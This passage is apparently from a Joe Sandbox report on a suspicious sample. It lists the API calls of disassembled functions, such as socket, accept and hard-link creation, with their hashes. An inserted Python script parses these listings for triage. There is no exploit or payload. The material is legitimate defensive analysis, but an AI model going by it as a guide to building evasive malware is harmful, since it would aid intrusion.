                                                                                                                            • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                            • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1473721057-0
                                                                                                                            • Opcode ID: 5dec897235398ff8dfc9b84a085f09b9ede9ebe49b8b673fdf707749075dc249
                                                                                                                            • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                                            • Opcode Fuzzy Hash: 5dec897235398ff8dfc9b84a085f09b9ede9ebe49b8b673fdf707749075dc249
                                                                                                                            • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                                            APIs
                                                                                                                            • __flush.LIBCMT ref: 00414630
                                                                                                                            • __fileno.LIBCMT ref: 00414650
                                                                                                                            • __locking.LIBCMT ref: 00414657
                                                                                                                            • __flsbuf.LIBCMT ref: 00414682
                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3240763771-0
                                                                                                                            • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                            • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                            • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                            • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                            • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                            • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CopyVariant$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2286883814-0
                                                                                                                            • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                            • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                                            • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                            • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                                            APIs
                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                            • #21.WSOCK32 ref: 004740E0
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1881357543-0
                                                                                                                            • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                            • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                                            • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                            • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
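The two LoadLibraryA/GetProcAddress blocks above (ICMP.DLL/IcmpCreateFile, kernel32.dll/IsWow64Process) and the socket.WSOCK32(00000002,00000002,00000011) block are the entries a triager pulls out of these function listings first: which APIs the sample resolves at run time instead of through its import table, what the socket is for, and which calls are ordinal-only. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin. It parses bullet lines in the format shown above (the sample input is constructed from lines copied out of this section), pairs each GetProcAddress with the preceding LoadLibrary in call order, decodes the socket() constants (2/2/0x11 = AF_INET, SOCK_DGRAM, IPPROTO_UDP), and lists ordinal calls such as #21.WSOCK32. The ordinal 21 = setsockopt entry is taken from the wsock32.dll export ordering and is an assumption to confirm against the export table of the DLL on the analysis host.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample input: "APIs" bullet lines copied from the function blocks of
# this report. A real run would feed the lines of one or more blocks instead.
SAMPLE_APIS = """\
• LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
• LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
• WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
• #21.WSOCK32 ref: 004740E0
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
"""

# One bullet: "<name>.<module>(<args>), ref: <addr>"  or  "<name>.<module> ref: <addr>"
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>[#\w]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Winsock constants as passed to socket(af, type, protocol); the report prints them in hex.
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {1: "IPPROTO_ICMP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

# Ordinal-only calls ("#<n>") must be resolved against the DLL's export table.
# 21 -> setsockopt follows the Winsock 1.1 export ordering of wsock32.dll; this is an
# assumption to confirm against the DLL shipped on the analysis host.
KNOWN_ORDINALS = {("WSOCK32", 21): "setsockopt"}


def parse_api_lines(text: str) -> List[Dict[str, object]]:
    """Turn the report's bullet lines into records, keeping call order. Lines that
    do not match the format (e.g. 'Part of subcall function ...') are skipped."""
    records: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        records.append({
            "name": m.group("name"),
            "module": m.group("module").upper(),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
        })
    return records


def _hex_arg(arg: str) -> Optional[int]:
    """'?' in the report means the sandbox could not recover the value."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def resolved_imports(records: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Pair each GetProcAddress with the most recent LoadLibrary* in call order.
    The handle argument is shown as 00000000 (return value of the previous call not
    recovered), so the pairing relies on order, not on the handle value."""
    pairs: List[Tuple[str, str]] = []
    current_lib: Optional[str] = None
    for r in records:
        name, args = r["name"], r["args"]
        if name in ("LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW") and args:
            current_lib = args[0]
        elif name == "GetProcAddress" and len(args) >= 2 and current_lib:
            pairs.append((current_lib, args[1]))
    return pairs


def decode_sockets(records: List[Dict[str, object]]) -> List[str]:
    """Render each socket() call as AF/TYPE/PROTO; unknown values stay numeric."""
    out = []
    for r in records:
        if r["name"] == "socket" and len(r["args"]) >= 3:
            af, ty, pr = (_hex_arg(a) for a in r["args"][:3])
            out.append(f"{AF.get(af, af)}/{SOCK_TYPE.get(ty, ty)}/{PROTO.get(pr, pr)}")
    return out


def ordinal_calls(records: List[Dict[str, object]]) -> List[Tuple[str, int, str]]:
    """List ordinal-only imports with the best-known name (or 'unknown')."""
    out = []
    for r in records:
        if r["name"].startswith("#"):
            n = int(r["name"][1:])
            out.append((r["module"], n, KNOWN_ORDINALS.get((r["module"], n), "unknown")))
    return out


if __name__ == "__main__":
    recs = parse_api_lines(SAMPLE_APIS)
    print("run-time resolved imports:", resolved_imports(recs))
    print("socket calls:", decode_sockets(recs))
    print("ordinal calls:", ordinal_calls(recs))
```

Pairing by call order is deliberate: within one function block the GetProcAddress handle argument is always printed as 00000000, so the library name can only be recovered from the LoadLibrary call that precedes it in the same listing. Run the parser over one block at a time to avoid pairing across unrelated functions.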
                                                                                                                            APIs
                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                            • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                            • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1352109105-0
                                                                                                                            • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                            • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                                                            • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                            • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                            • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                                                            • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                            • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                                                            APIs
                                                                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                            • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3321077145-0
                                                                                                                            • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                            • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                                            • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                            • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(?), ref: 004505BF
                                                                                                                            • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                            • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                            • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Proc$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2351499541-0
                                                                                                                            • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                            • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                                            • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                            • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                                                            • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                                                            • __itow.LIBCMT ref: 00461461
                                                                                                                            • __itow.LIBCMT ref: 004614AB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$__itow$_wcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2875217250-0
                                                                                                                            • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                            • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                                                            • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                            • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                              • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                              • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                              • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                            • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                            • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2759813231-0
                                                                                                                            • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                            • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                                                            • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                            • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2169480361-0
                                                                                                                            • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                            • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                            • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                            • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32 ref: 00448CB8
                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 312131281-0
                                                                                                                            • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                            • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                            • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                            • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                            APIs
                                                                                                                            • select.WSOCK32 ref: 0045890A
                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458927
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastacceptselect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 385091864-0
                                                                                                                            • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                            • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                            • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
